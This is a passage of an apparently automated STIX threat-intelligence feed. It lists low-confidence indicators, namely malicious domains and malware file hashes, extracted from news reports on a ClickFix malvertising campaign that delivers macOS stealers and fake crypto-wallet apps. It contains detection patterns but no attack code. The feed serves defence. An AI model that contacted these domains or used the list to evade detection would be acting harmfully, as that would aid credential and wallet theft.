News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1bdf3933-b017-4fde-a940-4a5ff209bc4c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: trekmesh15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; e","pattern":"[domain-name:value = 'trekmesh15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ea0569d-90a0-43ca-a88d-60f4882b812c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: umapla.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop","pattern":"[domain-name:value = 'umapla.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9b5ca098-6770-4707-bc3a-1b89af49c382","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: verse-18.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com A","pattern":"[domain-name:value = 'verse-18.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d7787672-8208-4b8c-9a9b-3d11c0afa6b8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: wantsellonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: osoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; s","pattern":"[domain-name:value = 'wantsellonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75df5b05-de87-44f2-ba7b-22f60342d431","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: weaveridge7.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com Septe","pattern":"[domain-name:value = 'weaveridge7.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--10dd8cbe-31be-441d-8a12-f305106aaf78","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: wuess.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: n weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domains Domain hou","pattern":"[domain-name:value = 'wuess.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e0614f9-d490-427b-ac8a-cb09968880eb","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 06a3d3bdeb33411fba53eed53cf528f3b33fdf5c2a74921d5d98002cb5e2ba1b","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cb92 SIC MP3/HTA payload and Talos clipper artifact SHA-256 06a3d3bdeb33411fba53eed53cf528f3b33fdf5c2a74921d5d98002cb5e2ba1b; d1690bec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975","pattern":"[file:hashes.'SHA-256' = '06a3d3bdeb33411fba53eed53cf528f3b33fdf5c2a74921d5d98002cb5e2ba1b']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b0272db9-d0fe-4777-9ddb-b56bffd25d87","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: b7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e; 131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4; ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c287","pattern":"[file:hashes.'SHA-256' = '131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--72e8b479-e492-45ae-99b1-0a51274d4661","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e51a7505","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 3c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540; 18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e51a7505; 249088420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd","pattern":"[file:hashes.'SHA-256' = '18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e51a7505']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3353ee53-b7ce-4435-b9c0-5e2588e8e98b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 249088420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd281938","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 9ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e51a7505; 249088420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd281938; 9eb96fc1fda13b143a90896793754b6a61942dbf87846895bb9ea8c1e8","pattern":"[file:hashes.'SHA-256' = '249088420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd281938']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b5113956-f3f5-4bf4-9f8a-bf85107c0cec","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739aecb92","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 2365d0c690db613ff30635970668f5699b65c3842ecdc4f1b695ed13a7; 279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739aecb92 SIC MP3/HTA payload and Talos clipper artifact SHA-256 06a3","pattern":"[file:hashes.'SHA-256' = '279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739aecb92']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8c05cd25-f4b7-4ab7-8b6d-29c1d98f0b10","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 3276414afb3c7ce7aa19db5401051ce4ad6968a7cc6bf8384cd6470c92541a24","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c891795dc2f5; 3276414afb3c7ce7aa19db5401051ce4ad6968a7cc6bf8384cd6470c92541a24 InstallFix MP3/HTA, InstallFix /cl and recovered InstallFix","pattern":"[file:hashes.'SHA-256' = '3276414afb3c7ce7aa19db5401051ce4ad6968a7cc6bf8384cd6470c92541a24']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1ef9c5f0-2426-41ef-b3ef-3d8ed57453e0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 480c65e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c891795dc2f5","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 83129f6771d186f60379dca30d208374cac45bac75d5459aaf0fabc8ad; 480c65e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c891795dc2f5; 3276414afb3c7ce7aa19db5401051ce4ad6968a7cc6bf8384cd6470c92","pattern":"[file:hashes.'SHA-256' = '480c65e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c891795dc2f5']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e0497555-3796-4043-b68e-707c4c0e6959","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 5e8ad983129f6771d186f60379dca30d208374cac45bac75d5459aaf0fabc8ad","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ake Ledger, Trezor and Exodus application artifacts SHA-256 5e8ad983129f6771d186f60379dca30d208374cac45bac75d5459aaf0fabc8ad; 480c65e5bb793da2d5ddfdcf00dd37bd4c7176ea0fb58d4e6bd5c89179","pattern":"[file:hashes.'SHA-256' = '5e8ad983129f6771d186f60379dca30d208374cac45bac75d5459aaf0fabc8ad']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eca6e604-61f1-4be7-bff5-a68cf78c1c84","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 6759c72365d0c690db613ff30635970668f5699b65c3842ecdc4f1b695ed13a7","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: c218e1aba3fcb Recovered x86 artifact and Amatera PE SHA-256 6759c72365d0c690db613ff30635970668f5699b65c3842ecdc4f1b695ed13a7; 279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739","pattern":"[file:hashes.'SHA-256' = '6759c72365d0c690db613ff30635970668f5699b65c3842ecdc4f1b695ed13a7']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c8f9c921-e7ea-418c-9e8a-2e79ed1ce309","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 93d986f39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 41ef5d316a1ae8631329349287e6a411 Metadata artifacts SHA-256 93d986f39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae; e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494","pattern":"[file:hashes.'SHA-256' = '93d986f39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae5f9b2b-cad9-48a2-825c-73fd7b2e232f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 9eb96fc1fda13b143a90896793754b6a61942dbf87846895bb9ea8c1e849cd96","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 420058e50b5e7d1e615a6b9c212e1c341b43fbd8b60cde30d5bd281938; 9eb96fc1fda13b143a90896793754b6a61942dbf87846895bb9ea8c1e849cd96 Houston, Pressureulcerlawyer, Lalandscapelighting, Aidevmas","pattern":"[file:hashes.'SHA-256' = '9eb96fc1fda13b143a90896793754b6a61942dbf87846895bb9ea8c1e849cd96']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--02e231d1-3cd1-47a1-93a2-ff73f7c6cd68","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287e6a411","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7; a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287e6a411 Metadata artifacts SHA-256 93d986f39599df747e4f65484a41d5e5","pattern":"[file:hashes.'SHA-256' = 'a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287e6a411']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c1dc7873-bd13-4bfb-ae19-b14862b1a885","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d1690bec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: bdeb33411fba53eed53cf528f3b33fdf5c2a74921d5d98002cb5e2ba1b; d1690bec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c; ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0","pattern":"[file:hashes.'SHA-256' = 'd1690bec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0bb3ad6f-8987-4a74-ae43-d641f4cf06e7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d4150c1c97f047c6edb14767bf1efa8f9e37d63b124f38f27da4ef52d570aac2","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 949cfc514f145262136898b009 September macOS artifact SHA-256 d4150c1c97f047c6edb14767bf1efa8f9e37d63b124f38f27da4ef52d570aac2 AccountsHelper artifact SHA-256 f71d72711fe132f00d1a10d6f8c","pattern":"[file:hashes.'SHA-256' = 'd4150c1c97f047c6edb14767bf1efa8f9e37d63b124f38f27da4ef52d570aac2']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ddf193e4-1289-424a-a05a-8c81d8ca3377","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcb","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331; d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcb Recovered x86 artifact and Amatera PE SHA-256 6759c72365d0c","pattern":"[file:hashes.'SHA-256' = 'd4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcb']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca7c764e-d955-45e6-97ab-a4455ade818f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7; d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540; 18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e5","pattern":"[file:hashes.'SHA-256' = 'd95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1ee825d9-e96d-4a92-89e4-6abb96007f48","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: f39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae; e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c Arkypc loader and helper SHA-256 f8d09bb7ef38015342fb8ae11c","pattern":"[file:hashes.'SHA-256' = 'e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1771dc00-ee99-4b78-844a-fb4655ca25d1","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: , InstallFix /cl and recovered InstallFix artifacts SHA-256 ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331; d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1a","pattern":"[file:hashes.'SHA-256' = 'ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f68ecd22-8f44-4772-876e-7153188be87a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 1301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4; ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb Fake Ledger, Trezor and Exodus application artifacts SHA-25","pattern":"[file:hashes.'SHA-256' = 'ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b49fd206-ec12-402f-9de9-dca235840112","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c; ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7; d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b","pattern":"[file:hashes.'SHA-256' = 'ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--30fc0e97-3c77-4eaa-b883-e2e63d46444a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Selectors for getData() , balanceOf() and setData() SHA-256 eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009 September macOS artifact SHA-256 d4150c1c97f047c6edb14767bf","pattern":"[file:hashes.'SHA-256' = 'eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc3cf80c-425e-48d2-8295-b5810d4f2f5d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 63b124f38f27da4ef52d570aac2 AccountsHelper artifact SHA-256 f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7; a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287","pattern":"[file:hashes.'SHA-256' = 'f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1dfd3b8b-dd84-435d-80bf-545b1d0e6a66","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: b41998c43341fcf3a494573d6c Arkypc loader and helper SHA-256 f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e; 131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f1","pattern":"[file:hashes.'SHA-256' = 'f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7f8b7534-d643-47a3-b36a-ff31062959b4","created":"2026-09-15T05:31:05.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: opusaccel.top","description":"Seen in \"China-Linked Hackers Exploit Chrome-Windows Zero-Day Chain to Deploy GRIMWEDGE\" (The Hacker News). Context: and loop that polls a command-and-control (C2) server 